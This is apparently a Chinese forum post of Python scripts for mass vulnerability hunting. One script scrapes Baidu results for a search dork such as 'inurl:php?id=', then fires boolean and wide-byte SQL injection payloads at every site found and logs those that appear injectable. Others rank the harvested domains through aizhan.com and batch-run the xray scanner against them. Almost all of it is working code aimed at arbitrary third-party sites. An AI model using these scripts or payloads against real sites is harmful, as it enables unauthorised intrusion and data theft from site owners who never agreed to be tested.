import re
import sys
import requests
import threading
from queue import Queue
from bs4 import BeautifulSoup as bs
class BaiduSiper(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self._queue = queue
def run(self):
while not self._queue.empty():
url = self._queue.get()
try:
self.get_url(url)
except Exception:
pass
def get_url(self, url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'}
r = requests.get(url, headers=headers)
soup = bs(r.text, 'lxml')
urls = soup.findAll("a", {"data-click": re.compile((".")), "class": None}) # a标签后加字典
# print(urls)
for i in urls:
try:
get_url = requests.get(i['href'], headers=headers, timeout=10)
if get_url.status_code == 200:
with open('./url.txt', 'a', encoding='utf-8') as xie:
xie.write(str(get_url.url) + '\n')
print(get_url.url)
scan = get_url.url
payloads = {'src': scan,
'bool_true': scan + ' aND 99=99',
'bool_false': scan + ' aND 99=11',
'new1':scan + '%27aND 99=99--+',
'new2':scan + '%27aND 99=11--+',
'dui1':scan + '%27;aND 99=99--+',
'dui2':scan + '%27;aND 99=11--+',
'kuan1':scan + '%df%27aND 99=99--+',
'kuan2': scan + '%df%27aND 99=11--+',
}
try:
#下方可添加新规则
r_scr = requests.get(payloads['src'], timeout=5).headers['Content-Length']
r_true = requests.get(payloads['bool_true'], timeout=5).headers['Content-Length']
r_false = requests.get(payloads['bool_false'], timeout=5).headers['Content-Length']
r_new1 = requests.get(payloads['new1'], timeout=5).headers['Content-Length']
r_new2 = requests.get(payloads['new2'], timeout=5).headers['Content-Length']
r_dui1 = requests.get(payloads['dui1'], timeout=5).headers['Content-Length']
r_dui2 = requests.get(payloads['dui2'], timeout=5).headers['Content-Length']
r_kuan1 = requests.get(payloads['kuan1'], timeout=5).headers['Content-Length']
r_kuan2 = requests.get(payloads['kuan2'], timeout=5).headers['Content-Length']
except Exception:
pass
if r_scr == r_true or r_new1 == r_true:
if r_true != r_false or r_new1 != r_new2:
with open('./sql.txt', 'a', encoding='utf-8') as xie:
xie.write(str(get_url.url) + '\n')
print(['存在注入:'], scan)
elif r_new1 == r_true:
if r_new1 != r_new2:
with open('./sql.txt', 'a', encoding='utf-8') as xie:
xie.write(str(get_url.url) + '\n')
print(['存在注入:'], scan)
elif r_dui1 != r_dui2:
with open('./sql.txt', 'a', encoding='utf-8') as xie:
xie.write(str(get_url.url) + '\n')
print(['存在注入:'], scan)
elif r_kuan1 != r_kuan2:
with open('./sql.txt', 'a', encoding='utf-8') as xie:
xie.write(str(get_url.url) + '\n')
print(['存在注入:'], scan)
#在下方与if r_scr缩进相同的位置可添加新的对比
except Exception:
pass
def main(keyword, pn):
queue = Queue()
for i in range(0, pn * 10, 10):
queue.put('https://www.baidu.com/s?wd=' + keyword + '&pn=' + str(i))
threads = []
thread_connt = 4
for i in range(thread_connt):
threads.append(BaiduSiper(queue))
for t in threads:
t.start()
for t in threads:
t.join()
def usage():
if len(sys.argv) != 3:
print("用法: %s 百度语法关键字 要爬取页数" % sys.argv[0])
print("例如: %s inurl:php?id= 10" % sys.argv[0])
print('+' + '-' * 60 + '+')
sys.exit()
if __name__ == '__main__':
usage()
main(sys.argv[1], int(sys.argv[2]))
2.2:处理链接并查询权重分类保存
代码如下
[Python] 纯文本查看复制代码
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import sys
def chuli(sub):
subdomian = []
f = open("./%s.txt" % sub)
line = f.readline()
n = 0
while line:
line = f.readline()
domain = str(urlparse(line).netloc)
if domain in subdomian:
pass
else:
subdomian.append(domain)
n += 1
f.close()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'}
n = 0
m = 0
for i in subdomian:
url = 'https://www.aizhan.com/cha/'+ i +'/'
try:
conn = requests.session()
conn.get('https://www.aizhan.com', headers=headers)
html = conn.get(url, stream=True, headers=headers, timeout=8)
soup = BeautifulSoup(html.content, 'html.parser')
get_quan = soup.find('a',attrs={'id':'baidurank_br','target':'_blank'}).find_next('img')
a = get_quan['alt']
if a != 'n':
with open('./%s.txt' % a, 'a', encoding='utf-8') as xie:
xie.write(str(i) + '\n')
else:
with open('./%s.txt' % a, 'a', encoding='utf-8') as xie:
xie.write(str(i) + '\n')
n+=1
print('已处理%d个'%n)
except:
m+=1
print('域名:%s查询失败' %i)
print('查询权重并分类完成')
print('查询失败%d个' %m)
if __name__ == '__main__':
sub = sys.argv[1]
chuli(sub)
2.3:调用xray对文件内链接进行批量扫描
代码如下
[Python] 纯文本查看复制代码
import os
import hashlib
import re
def xrayScan(targeturl,outputfilename="test"):
scanCommand="xray.exe webscan --basic-crawler {} --html-output {}.html".format(targeturl,outputfilename) # xray.exe根据xray程序名改
print(scanCommand)
os.system(scanCommand)
return
def pppGet():
f = open("target.txt") #根据文件名改
lines = f.readlines()
pattern = re.compile(r'^http://')
for line in lines:
try:
if not pattern.match(line.strip()):
targeturl="http://"+line.strip()
else:
targeturl=line.strip()
print(targeturl.strip())
outputfilename=hashlib.md5(targeturl.encode("utf-8"))
xrayScan(targeturl.strip(), outputfilename.hexdigest())
except Exception as e:
print(e)
pass
f.close()
print("扫描完毕")
return
def main():
pppGet()
return
if __name__ == '__main__':
main()
2.4:python库的安装
代码如下
[Python] 纯文本查看复制代码
# PipInstall.py
import os
libs = {"BeautifulSoup4", "requests"};
#libs中可添加需要安装的库
try:
for lib in libs:
print("start install {0}".format(lib));
os.system("pip install " + lib);
print("{} install successful".format(lib));
print("全部安装成功");
except:
print("部分安装出现错误");